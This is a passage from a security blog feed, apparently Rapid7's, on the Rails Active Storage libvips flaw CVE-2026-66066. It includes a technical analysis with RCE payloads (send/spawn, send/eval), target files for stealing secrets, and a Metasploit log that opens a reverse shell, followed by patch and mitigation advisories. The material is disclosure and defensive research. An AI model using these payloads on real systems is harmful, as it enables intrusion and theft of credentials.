+++ b/activestorage/lib/active_storage/analyzer/image_analyzer/vips.rb
@@ -2,0 +3,2 @@
+require "active_storage/vips"
+
diff --git a/activestorage/lib/active_storage/vips.rb b/activestorage/lib/active_storage/vips.rb
new file mode 100644
index 0000000000000..16b2ddbfbaad1
--- /dev/null
+++ b/activestorage/lib/active_storage/vips.rb
@@ -0,0 +23,20 @@
+if ActiveStorage::VIPS_AVAILABLE
+  begin
+    # image_processing 2.0 calls Vips.block_untrusted(true) itself when it loads, so it has to load
+    # before the lines below. Leaving it to load later, when the transformer first asks for it,
+    # would disable the loaders again after an application's initializers had re-enabled them.
+    require "image_processing/vips"
+  rescue LoadError
+    # image_processing is only needed to generate variants, not to analyze blobs.
+  end
+
+  unless Vips.respond_to?(:block_untrusted) # &lt;-- [20]
+    raise &lt;&lt;~ERROR.squish
+      libvips's unfuzzed operations are not safe to use with untrusted content, and Active Storage
+      cannot disable them. Disabling them requires libvips 8.13 or later and ruby-vips 2.2.1 or
+      later. Please upgrade libvips and ruby-vips, or remove the ruby-vips gem from your Gemfile.
+    ERROR
+  end
+
+  Vips.block_untrusted(true) # &lt;-- [21]
+end</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Active Storage's engine loads the Vips analyzer during initialization, so the new </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>require "active_storage/vips"</span></span><span style='font-size: undefined;'> runs during boot rather than waiting for a later representation request. At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[20]</span></span><span style='font-size: undefined;'>, patched Active Storage refuses to boot if the loaded ruby-vips/libvips pair does not expose the blocking API it needs. At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[21]</span></span><span style='font-size: undefined;'>, it blocks those operations globally. Because </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>matload</span></span><span style='font-size: undefined;'> is marked </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>VIPS_OPERATION_UNTRUSTED</span></span><span style='font-size: undefined;'>, libvips skips it before the crafted file can reach libmatio.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>From file read to code execution</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The file read can recover arbitrary files readable by the Rails worker. On Linux, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/proc/self/environ</span></span><span style='font-size: undefined;'> is a useful first target because it may contain </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SECRET_KEY_BASE</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>RAILS_MASTER_KEY</span></span><span style='font-size: undefined;'>, or service credentials, but the file-read primitive itself is not Linux-specific. Procfs is only a convenient route to Rails signing material. An exploit that relies only on </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/proc/self/environ</span></span><span style='font-size: undefined;'> will miss applications that keep </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>secret_key_base</span></span><span style='font-size: undefined;'> in encrypted credentials or legacy </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>secrets.yml</span></span><span style='font-size: undefined;'> files. Useful read targets in those cases include </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>config/master.key</span></span><span style='font-size: undefined;'>, encrypted credential files, and legacy </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>secrets.yml</span></span><span style='font-size: undefined;'> paths. Before using a candidate secret, an exploit can check it against a genuine signed Active Storage blob ID.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Once an attacker has recovered </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>secret_key_base</span></span><span style='font-size: undefined;'> and derived the Active Storage verifier key, they can sign a new variation instead of replaying an existing one. Ethiack's write-up uses </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>instance_eval</span></span><span style='font-size: undefined;'> for this step. We confirmed that the same Vips-side transformation validation gap also accepts the following JSON-compatible shapes:</span></p><p></p><pre language="json">{"send":["spawn","/bin/sh","-c","id"]}
{"send":["eval","File.write('/tmp/kr2s', %x{id})"]}</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>In image_processing </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>1.14.0</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Chainable#apply</span></span><span style='font-size: undefined;'> invokes the attacker-controlled transformation name on the builder:</span></p><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'></span></p><pre language="ruby">def apply(operations)
  operations.inject(self) do |builder, (name, argument)|
	if argument == true || argument == nil
	  builder.public_send(name)
	elsif argument.is_a?(Array)
	  builder.public_send(name, *argument) # &lt;-- [22]
	elsif argument.is_a?(Hash)
	  builder.public_send(name, **argument)
	else
	  builder.public_send(name, argument)
	end
  end
end</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>[22]</span></span><span style='font-size: undefined;'>, a transformation named </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>send</span></span><span style='font-size: undefined;'> reaches the builder's public </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>send</span></span><span style='font-size: undefined;'> method. The first array element becomes a second method dispatch, which can invoke private </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Kernel#spawn</span></span><span style='font-size: undefined;'> or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Kernel#eval</span></span><span style='font-size: undefined;'>. Execution occurs while the pipeline is being built, before normal image operations run. In our tests, the representation request returned HTTP 500 because </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>spawn</span></span><span style='font-size: undefined;'> or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>eval</span></span><span style='font-size: undefined;'> returns a non-builder value after the payload has already executed.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>This RCE path does not depend on a Marshal object gadget. We validated it against Rails </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.0.5</span></span><span style='font-size: undefined;'> configured with </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>config.active_support.message_serializer = :json</span></span><span style='font-size: undefined;'>. We also tested the same structure on older Rails branches whose signed messages used Marshal serialization, but the attacker-controlled data remains a </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Hash</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Array</span></span><span style='font-size: undefined;'>, and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>String</span></span><span style='font-size: undefined;'> structure rather than a deserialization gadget.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The MAT/HDF5 file read and the missing Vips-side transformation validation are distinct parts of the RCE chain. Rails pull request </span><a href="https://github.com/rails/rails/pull/56995"><span style='font-size: undefined;'>rails/rails#56995</span></a><span style='font-size: undefined;'> discusses the same Vips-side validation gap. CVE-2026-66066 matters here because the file read can recover the signing material needed to sign a malicious variation for the built-in representation route.</span></p><h2 style="direction: ltr;">Exploitation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Our </span><a href="https://github.com/rapid7/metasploit-framework/pull/21733" target="_self"><span style='font-size: undefined;'>Metasploit module</span></a><span style='font-size: undefined;'> follows the representation-based chain described above. It creates crafted direct-upload blobs, confirms the file read against </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/proc/version</span></span><span style='font-size: undefined;'>, recovers and validates Rails signing material, signs an ImageProcessing variation, and triggers either </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>send/spawn</span></span><span style='font-size: undefined;'> for command payloads or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>send/eval</span></span><span style='font-size: undefined;'> for native Ruby payloads.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The module uses the returned PNG representation instead of the narrower </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>MATLAB_empty</span></span><span style='font-size: undefined;'> metadata channel because the PNG path returns larger chunks directly in the HTTP response and gives the module a read channel it can validate automatically during secret recovery. A standalone proof of concept targeting an application that only analyzes uploads could reasonably prefer </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>MATLAB_empty</span></span><span style='font-size: undefined;'>, but that path depends on an application-specific way to observe width and height metadata or logs. For code execution, the module uses </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>send/spawn</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>send/eval</span></span><span style='font-size: undefined;'>, which fit Metasploit command and Ruby payloads directly.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>In the lab run below, the representation used by the module resized the image, so the module selected a 20x20 sharpened text-read layout and recovered 180 bytes per request. It then recovered </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SECRET_KEY_BASE</span></span><span style='font-size: undefined;'> from </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/proc/self/environ</span></span><span style='font-size: undefined;'>, signed a JSON variation, and opened a shell as the Rails process user:</span></p><p></p><pre language="shell-session">msf6 &gt; use exploit/multi/http/rails_activestorage_vips_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/rails_activestorage_vips_rce) &gt; set RHOSTS 127.0.0.1
RHOSTS =&gt; 127.0.0.1
msf6 exploit(multi/http/rails_activestorage_vips_rce) &gt; set RPORT 3003
RPORT =&gt; 3003
msf6 exploit(multi/http/rails_activestorage_vips_rce) &gt; set LHOST 172.17.0.1
LHOST =&gt; 172.17.0.1
msf6 exploit(multi/http/rails_activestorage_vips_rce) &gt; run

[*] Running automatic check ("set AutoCheck false" to disable)
[+] Selected the 20x20 sharpened text-read layout (180 bytes per request)
[+] The target is vulnerable. Recovered /proc/version with the 20x20 sharpened layout
[*] Reading up to 65536 bytes from /proc/self/environ
[*] Detected SHA1 Active Support verifier signatures
[*] Detected the Active Support json message serializer
[*] Validated SHA256 key derivation against a signed blob ID
[*] Stored recovered environment bytes in: /home/cryptocat/.msf4/loot/20260731004237_default_127.0.0.1_rails.process.en_047300.bin
[+] Recovered SECRET_KEY_BASE from /proc/self/environ
[*] Triggering the ImageProcessing send/spawn variation using a verifier key derived from /proc/self/environ
[*] Command shell session 1 opened

msf6 exploit(multi/http/rails_activestorage_vips_rce) &gt; sessions -i 1 -c id
[*] Running 'id' on shell session 1 (127.0.0.1)
uid=1000(rails) gid=1000(rails) groups=1000(rails)</pre><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The SHA1 and SHA256 lines refer to separate Rails settings. The first is the MessageVerifier digest used on the signed blob ID. The second is the key-generator digest used to derive the Active Storage key.</span></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Ethiack's published  1x1 oracle is byte-exact because interpolation has no adjacent pixel values to mix into the result. Our module also tries larger square </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>uint8</span></span><span style='font-size: undefined;'> layouts with </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/dev/zero</span></span><span style='font-size: undefined;'> columns between file bytes. With those columns, it can invert image_processing </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>1.14.0</span></span><span style='font-size: undefined;'>'s vertical sharpen pass and recover more text per request. We still validate every recovered secret against a genuine Active Storage signature because the larger transport is not byte-exact for arbitrary binary data.</span></p><h2 style="direction: ltr;">Remediation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For remediation guidance, see Rapid7's </span><a href="https://www.rapid7.com/blog/post/etr-kindarails2shell-cve-2026-66066-critical-arbitrary-file-read-and-possible-remote-code-execution-in-ruby-on-rails/"><span style='font-size: undefined;'>Emergent Threat Response blog</span></a><span style='font-size: undefined;'> and the Rails </span><a href="https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm"><span style='font-size: undefined;'>security advisory</span></a><span style='font-size: undefined;'>. The fixed Active Storage releases block untrusted libvips operations during initialization and require libvips </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.13</span></span><span style='font-size: undefined;'> or later plus ruby-vips </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>2.2.1</span></span><span style='font-size: undefined;'> or later when ruby-vips is installed.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/ra-kindarails2shell-technical-analysis-cve-2026-66066</link>
      <guid isPermaLink="false">bltc9f39469e18d39db</guid>
      <category><![CDATA[Rapid7 Analysis]]></category>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category><dc:creator><![CDATA[Jonah Burgess]]></dc:creator>
      <pubDate>Mon, 03 Aug 2026 17:11:25 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcbf09ec3af35e28e/6a15c63f08221ed5144dbf77/webinar-rapid7-logo.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[KindaRails2Shell: CVE-2026-66066, Critical Arbitrary File Read and Possible Remote Code Execution in Ruby on Rails]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 29, 2026, the Ruby on Rails project </span><a href="https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm"><span style='font-size: undefined;'>published a security advisory</span></a><span style='font-size: undefined;'> for </span><a href="https://www.cve.org/CVERecord?id=CVE-2026-66066"><span style='font-size: undefined;'>CVE-2026-66066</span></a><span style='font-size: undefined;'>, a critical vulnerability affecting Active Storage image processing when used in conjunction with the libvips image processing library. The vulnerability has a CVSSv4 score of </span><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"><span style='font-size: undefined;'>9.5</span></a><span style='font-size: undefined;'> and is classified as Initialization of a Resource with an Insecure Default (</span><a href="https://cwe.mitre.org/data/definitions/1188.html"><span style='font-size: undefined;'>CWE-1188</span></a><span style='font-size: undefined;'>). An unauthenticated attacker may be able to leverage CVE-2026-66066 and read files accessible to the Rails application process, potentially exposing secrets that could enable remote code execution (RCE) or access to connected systems.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>An application is affected when it uses libvips for Active Storage image processing and accepts image uploads from untrusted users. Rails notes that generating image variants is not a separate requirement for exposure. Vips is the default Active Storage variant processor for applications configured with Rails </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>7.0</span></span><span style='font-size: undefined;'> or later defaults. According to </span><a href="https://ethiack.com/info-hub/research/kindarails2shell-rails-rce-cve-2026-66066"><span style='font-size: undefined;'>Ethiack</span></a><span style='font-size: undefined;'>, only the Vips processor is affected; applications using Magick are not affected through the reported vector.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As of July 30, 2026, Rapid7 is not aware of exploitation in the wild. Ethiack and GMO Flatt Security, who independently reported the vulnerability, have withheld proof-of-concept code and details of the full attack chain. Public code claiming to exploit CVE-2026-66066 exists, but it is unclear how closely it corresponds to the full attack chain reported privately to Rails. According to the </span><a href="https://discuss.rubyonrails.org/t/cve-2026-66066-possible-arbitrary-file-read-and-remote-code-execution-in-active-storage-variant-processing/91432"><span style='font-size: undefined;'>Rails Security Announcement</span></a><span style='font-size: undefined;'>, additional details will be disclosed no later than August 28, 2026. Rapid7 recommends remediating affected applications on an urgent basis, outside of normal patch cycles.</span></p><p><span style='font-size: undefined;'><strong>Update #1</strong></span><span style='font-size: undefined;'>: On July 31, 2026, Rails </span><a href="https://discuss.rubyonrails.org/t/cve-2026-66066-attack-details-and-tools-to-perform-a-forensic-investigation/91441"><span style='font-size: undefined;'>published technical details and forensic tools</span></a><span style='font-size: undefined;'> earlier than its planned August 28 disclosure date after several researchers reverse-engineered the attack and published proof-of-concept code.</span></p><h2 style="direction: ltr;">Technical overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>libvips uses operations to load and save image formats, including operations backed by third-party libraries. Some are marked "unfuzzed" or "untrusted" because they are unsafe for untrusted content. According to Rails, Active Storage did not disable these operations before processing user-supplied files, which may allow a crafted upload to trigger an unsafe operation and disclose files readable by the application.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><a href="https://github.com/rails/rails-forensics-CVE-2026-66066/blob/main/reference/the-attack.md"><span style='font-size: undefined;'>attack details published by Rails</span></a><span style='font-size: undefined;'> describe a chain in which an attacker creates a blob through Active Storage's direct-upload endpoint with a false image content type and obtains a genuine signed </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>variation_key</span></span><span style='font-size: undefined;'> from a page that renders an Active Storage representation. A crafted file identifies itself to libvips as a MATLAB level 5 file but to libmatio as a MAT 7.3 HDF5 container. HDF5's External File List then reads bytes from an attacker-selected path, which are rendered as image pixels and returned in the resulting variant. This known chain also requires the deployed libvips build to include the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>matload</span></span><span style='font-size: undefined;'> operation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For this documented chain, the Active Storage direct-upload route must be reachable. When Active Storage routes are mounted, the direct-upload route is present by default even if the application's own interface does not use direct uploads. Rapid7 testing found that ordinary server-side attachment does not satisfy this chain because Rails re-identifies the crafted file as MATLAB data before variant processing.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The arbitrary file-read stage does not require knowledge of </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>secret_key_base</span></span><span style='font-size: undefined;'> or a forged variation key. Rapid7 also </span><a href="https://github.com/rapid7/metasploit-framework/pull/21733"><span style='font-size: undefined;'>verified</span></a><span style='font-size: undefined;'> an RCE escalation in which recovered Rails signing material is used to forge an ImageProcessing 1.x variation; this path does not require Marshal deserialization.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><a href="https://github.com/rails/rails/commit/349e7a5d5b4b715af1e416db824f3c078a7d59e5"><span style='font-size: undefined;'>Rails patch</span></a><span style='font-size: undefined;'> that remediates CVE-2026-66066, disables untrusted operations during Active Storage initialization. When ruby-vips is installed, patched versions prevent the application from starting if ruby-vips or libvips is too old to support that protection.</span></p><p><span style='font-size: undefined;'>On August 3, 2026, Rapid7 Labs published a full root cause </span><a href="https://www.rapid7.com/blog/post/ra-kindarails2shell-technical-analysis-cve-2026-66066/"><span style='font-size: undefined;'>technical analysis</span></a><span style='font-size: undefined;'> of CVE-2026-66066, detailing the full RCE chain and accompanying </span><a href="https://github.com/rapid7/metasploit-framework/pull/21733"><span style='font-size: undefined;'>metasploit module</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Organizations running affected Ruby on Rails applications should upgrade to a fixed Active Storage release and ensure libvips is </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.13</span></span><span style='font-size: undefined;'> or later. Updating Rails or Active Storage alone is not sufficient when an older libvips version is installed.</span></p><p><span style='font-size: undefined;'>Rails has published </span><a href="https://github.com/rails/rails-forensics-CVE-2026-66066"><span style='font-size: undefined;'>forensic tools</span></a><span style='font-size: undefined;'> to assess whether an application was vulnerable and search Active Storage data for crafted files. Because scheduled cleanup of unattached blobs may remove evidence, Rapid7 recommends beginning forensic assessment promptly.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The Rails advisory identifies patched Active Storage releases </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>7.2.3.2</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.0.5.1</span></span><span style='font-size: undefined;'>, and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.1.3.1</span></span><span style='font-size: undefined;'>. The fixed Rails releases are:</span></p><table><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Rails branch</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Affected versions</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Fixed version</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rails </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>7.x</span></span></p></td><td><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>7.0.0</span></span><span style='font-size: undefined;'> through </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>7.2.3.1</span></span></p></td><td><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>7.2.3.2</span></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rails </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.0.x</span></span></p></td><td><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.0.0</span></span><span style='font-size: undefined;'> through </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.0.5</span></span></p></td><td><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.0.5.1</span></span></p></td></tr><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>Rails </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.1.x</span></span></p></td><td><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.1.0</span></span><span style='font-size: undefined;'> through </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.1.3</span></span></p></td><td><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.1.3.1</span></span></p></td></tr></tbody></table><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>The Rails advisory lists all Active Storage releases earlier than </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>7.2.3.2</span></span><span style='font-size: undefined;'> as affected, which includes releases before Rails </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>7.0</span></span><span style='font-size: undefined;'>. Ethiack reports that Rails </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>6.0.0</span></span><span style='font-size: undefined;'> through </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>6.1.7.10</span></span><span style='font-size: undefined;'> may be affected when Active Storage is configured to use Vips, and Rapid7 has </span><a href="https://github.com/rapid7/metasploit-framework/pull/21733"><span style='font-size: undefined;'>verified</span></a><span style='font-size: undefined;'> that the known attack works on the Rails </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>6.0</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>6.1</span></span><span style='font-size: undefined;'> branches under that non-default configuration. Rails has not published fixed releases for branches earlier than </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>7.2</span></span><span style='font-size: undefined;'>, so affected applications on those branches should migrate to a supported fixed branch or apply the applicable workaround below.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>When ruby-vips is installed, organizations should ensure it is </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>2.2.1</span></span><span style='font-size: undefined;'> or later. Rails advises affected organizations to replace </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>secret_key_base</span></span><span style='font-size: undefined;'> and other secrets accessible to the application process, including the Rails master key and the credentials it decrypts, storage service credentials, database credentials, and third-party service tokens or keys. Replacing </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>secret_key_base</span></span><span style='font-size: undefined;'> expires active sessions and affects encrypted and signed cookies, signed global IDs, and Active Storage URLs.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As a temporary workaround on libvips </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.13</span></span><span style='font-size: undefined;'> or later, organizations can set </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>VIPS_BLOCK_UNTRUSTED</span></span><span style='font-size: undefined;'> or, with ruby-vips </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>2.2.1</span></span><span style='font-size: undefined;'> or later, call </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>Vips.block_untrusted(true)</span></span><span style='font-size: undefined;'> from an initializer. For libvips versions earlier than </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>8.13</span></span><span style='font-size: undefined;'>, Rails states that the only workaround is to remove the libvips dependency.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the </span><a href="https://github.com/rails/rails/security/advisories/GHSA-xr9x-r78c-5hrm"><span style='font-size: undefined;'>Ruby on Rails security advisory</span></a><span style='font-size: undefined;'>.</span></p><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Exposure Command, InsightVM, and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-66066 with vulnerability checks expected to be available in the July 31 content release. </span></p><h2 style="direction: ltr;">Updates</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 30, 2026</strong></span><span style='font-size: undefined;'>: Initial publication.</span></p></li><li><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 31, 2026</strong></span><span style='font-size: undefined;'>: Updated with technical details and forensic resources published by Rails, and clarified the affected version range.</span></p></li><li><span style='font-size: undefined;'><strong>August 3, 2026</strong></span><span style='font-size: undefined;'>: Added a Technical analysis section for the new Rapid7 Analysis.</span></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/etr-kindarails2shell-cve-2026-66066-critical-arbitrary-file-read-and-possible-remote-code-execution-in-ruby-on-rails</link>
      <guid isPermaLink="false">bltd475cb0f6744bf65</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Rapid7 Labs]]></dc:creator>
      <pubDate>Thu, 30 Jul 2026 16:11:10 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Critical VMware vCenter Vulnerabilities Allow Authentication Bypass and Remote Code Execution (CVE-2026-59309, CVE-2026-59310)]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On July 29, 2026, Broadcom published security advisory </span><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/38017"><span style='font-size: undefined;'>VMSA-2026-0006</span></a><span style='font-size: undefined;'> addressing multiple vulnerabilities in several VMWare products. Included in the advisory are two critical remotely exploitable vulnerabilities affecting VMware vCenter Server: </span><a href="https://www.rapid7.com/db/vulnerabilities/cve-2026-59309/"><span style='font-size: undefined;'>CVE-2026-59309</span></a><span style='font-size: undefined;'> and </span><a href="https://www.rapid7.com/db/vulnerabilities/cve-2026-59310/"><span style='font-size: undefined;'>CVE-2026-59310</span></a><span style='font-size: undefined;'>. Both vulnerabilities carry CVSSv3.1 base scores of </span><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"><span style='font-size: undefined;'>9.8</span></a><span style='font-size: undefined;'> and can be exploited by unauthenticated attackers with network access to a vulnerable vCenter Server.</span></p><table><colgroup data-width='750'><col style="width:22.063492063492067%"/><col style="width:16.507936507936506%"/><col style="width:61.42857142857143%"/></colgroup><thead><tr><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3.1</strong></span></p></th><th><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Description Summary</strong></span></p></th></tr></thead><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'>CVE-2026-59309</span></p></td><td><p style="direction: ltr;"><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"><span style='font-size: undefined;'>9.8 (Critical)</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>An authentication bypass vulnerability in the VMware Directory Service of vCenter that could allow a remote attacker to bypass authentication and gain unauthorized access to the vCenter management 